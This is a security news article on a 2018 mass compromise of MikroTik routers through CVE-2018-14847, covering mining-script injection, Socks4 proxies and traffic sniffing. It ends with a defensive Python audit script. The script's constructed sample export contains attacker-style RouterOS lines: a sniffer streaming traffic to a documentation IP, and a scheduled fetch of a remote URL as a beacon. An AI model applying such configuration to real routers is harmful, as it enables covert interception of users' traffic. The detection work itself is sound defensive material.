Widespread Compromise of MikroTik Routers Exposes Vulnerabilities
Recent reports describe a large-scale compromise of MikroTik routers. Last month we covered a crypto-mining campaign that hijacked more than 200,000 MikroTik devices through a RouterOS vulnerability that researchers associate with tooling from the CIA's Vault 7 leaks. Now researchers at Qihoo 360 Netlab report that, of roughly 370,000 routers still running vulnerable firmware, around 239,000 have been reconfigured to expose a Socks4 proxy and more than 7,500 have had their traffic forwarded to attacker-controlled hosts, with the eavesdropping traced back to mid-July.
At the centre of the intrusion is Winbox Any Directory File Read (CVE-2018-14847), an unauthenticated arbitrary file read over the Winbox management protocol. Netlab links the campaign to Chimay Red, the RouterOS exploit published in the Vault 7 leak, and to a remote code execution flaw in Webfig. Either route gives an attacker administrative access to RouterOS, whose management services listen on TCP/8291 (Winbox) and TCP/80 and TCP/8080 (Webfig/www). Winbox is MikroTik's Windows configuration client; on connection it downloads plugin files from the router, and the file-read flaw sits in that same file-transfer path, which lets an attacker pull the router's user database off the device and recover the admin credentials.
Qihoo 360's scan shows that, although MikroTik fixed CVE-2018-14847 in April 2018 (RouterOS 6.42.1), more than 370,000 of the 1.2 million devices it examined still run vulnerable firmware. On compromised routers the researchers found three distinct abuses: CoinHive mining code injected into web traffic, Socks4 proxies silently enabled, and user traffic captured and forwarded without the owner's knowledge.
The CoinHive injection works through the RouterOS HTTP proxy. The attacker enables the proxy, adds an access rule that denies requests and redirects them to a local error page, and writes the web-mining script into that page, so every client whose HTTP traffic passes through the proxy is served it. In practice the tactic largely fails: the same access list blocks the external resources the mining script has to load, so the miner never actually runs.
The Socks4 proxy, enabled on TCP/4153, gives the attacker a durable foothold: the setting survives reboots, and the device periodically reports its current IP address to an attacker-controlled URL, so the proxy can be located again whenever the address changes. About 239,000 IP addresses currently expose such a proxy, and the attacker uses them to scan for further MikroTik devices.
For traffic collection the attacker turns on the router's built-in packet sniffer and streams the captured packets to an attacker-controlled IP address; around 7,500 MikroTik devices are forwarding traffic this way. The capture filter includes SNMP (ports 161 and 162), which is management-plane traffic rather than anything an ordinary user generates, so the interest appears to extend to the networks behind the routers and not only to user browsing.
Affected routers are spread worldwide, with Russia the most heavily hit, followed by countries including Iran, Brazil, India and the United States. The researchers are not publishing victim IP addresses, but affected network operators can contact them for the data.
RouterOS users should update to a fixed release immediately. Because CVE-2018-14847 leaks the router's credential store, patching alone does not evict an attacker who has already logged in: change the admin password, remove any users you did not create, and review the HTTP proxy (/ip proxy), Socks proxy (/ip socks), packet sniffer (/tool sniffer) and scheduler (/system scheduler) configuration for entries that are not yours. Where possible, keep Winbox and Webfig off the internet-facing interface. The incident is a reminder that exposed management services on network infrastructure remain a persistent target.
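As an added example (not code from Netlab 360 or MikroTik), the following Python script audits the text of a RouterOS /export dump for the indicators described above: a Socks proxy enabled, an HTTP proxy that redirects denied requests to a local page, a packet sniffer streaming captures off-box, and a scheduled job that fetches a URL. The sample export it parses is constructed for this illustration; the IP addresses are RFC 5737 documentation ranges, the TRUSTED_NETS allowlist is an assumed local policy, and the scheduler-based beacon and exact rule syntax are assumptions about how such a configuration would look rather than artefacts recovered from the campaign.

```python
"""Audit a RouterOS `/export` dump for the indicators discussed above.

Added example, not code from Netlab 360 or MikroTik. The sample export
is constructed; the IP addresses are RFC 5737 documentation ranges.
"""
import ipaddress
import re
import shlex

# Constructed `/export` output resembling a compromised router. The
# scheduler beacon and the exact rule syntax are assumptions for illustration.
SAMPLE_EXPORT = r"""
# sep/04/2018 10:00:00 by RouterOS 6.40.4
/ip proxy
set enabled=yes port=8080
/ip proxy access
add action=deny dst-host=* redirect-to=error.html
/ip socks
set enabled=yes port=4153
/tool sniffer
set filter-ip-protocol=tcp filter-port=20,21,25,110,143,161,162 \
    streaming-enabled=yes streaming-server=203.0.113.10
/system scheduler
add interval=1d name=u7 policy=read,write,test \
    on-event="/tool fetch url=http://203.0.113.10/i.php mode=http keep-result=no"
"""

# Assumed local policy: streaming the sniffer to a collector inside these
# ranges is treated as legitimate; anything else is flagged.
TRUSTED_NETS = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")


def parse_export(text):
    """Return {menu_path: [entry, ...]} where each entry maps key -> value.

    Handles RouterOS line continuation (trailing backslash) and quoted values.
    """
    config = {}
    section = None
    pending = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):  # export wraps long lines with a trailing backslash
            pending += line[:-1] + " "
            continue
        line, pending = pending + line, ""
        if line.startswith("/"):  # a menu path such as `/ip socks` opens a section
            section = line
            config.setdefault(section, [])
            continue
        tokens = shlex.split(line)
        if section is None or not tokens or tokens[0] not in ("set", "add"):
            continue
        entry = {"_verb": tokens[0]}
        for tok in tokens[1:]:
            key, sep, value = tok.partition("=")
            if sep:
                entry[key] = value
            else:  # positional target such as `0` or `[ find default=yes ]`
                entry.setdefault("_target", []).append(tok)
        config[section].append(entry)
    return config


def audit(config, trusted_nets=TRUSTED_NETS):
    """Return a list of human-readable findings, one per indicator matched."""
    findings = []

    # 1. Socks proxy enabled: the campaign used TCP/4153 (RouterOS default is 1080).
    for e in config.get("/ip socks", []):
        if e.get("enabled") == "yes":
            findings.append(f"socks proxy enabled on tcp/{e.get('port', '1080')}")

    # 2. HTTP proxy on, with a deny rule that redirects to a local page: the
    #    shape of the CoinHive error-page injection.
    proxy_on = any(e.get("enabled") == "yes" for e in config.get("/ip proxy", []))
    for e in config.get("/ip proxy access", []):
        if proxy_on and e.get("action") == "deny" and e.get("redirect-to"):
            findings.append(f"http proxy redirects denied requests to {e['redirect-to']}")

    # 3. Packet sniffer streaming captured traffic to a host outside trusted ranges.
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    for e in config.get("/tool sniffer", []):
        server = e.get("streaming-server")
        if e.get("streaming-enabled") == "yes" and server:
            try:
                external = not any(ipaddress.ip_address(server) in n for n in nets)
            except ValueError:  # a hostname rather than an address: treat as untrusted
                external = True
            if external:
                findings.append(
                    f"sniffer streams traffic to {server} (ports {e.get('filter-port', 'all')})"
                )

    # 4. Scheduled job that fetches a URL: a periodic beacon or re-infection hook.
    for e in config.get("/system scheduler", []):
        m = re.search(r"/tool fetch\b.*?\burl=(\S+)", e.get("on-event", ""))
        if m:
            findings.append(
                f"scheduler job '{e.get('name')}' fetches {m.group(1)} every {e.get('interval')}"
            )
    return findings


if __name__ == "__main__":
    for finding in audit(parse_export(SAMPLE_EXPORT)):
        print("FINDING:", finding)
```

To use it on a real device, run /export on the router (or over SSH) and pass the resulting text to parse_export. The trusted-network allowlist exists because streaming the sniffer to an internal collector is a legitimate setup; only an external or unresolvable streaming target is reported, and a disabled Socks proxy produces no finding at all.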
The activity maps cleanly onto the MITRE ATT&CK framework: initial access through exploitation of a public-facing application (T1190), persistence via the reconfigured proxy and the periodic IP beacon, collection through network sniffing (T1040), and impact through cryptocurrency mining (resource hijacking, T1496). Keeping management services patched and off the public internet remains the most effective defence against this class of intrusion.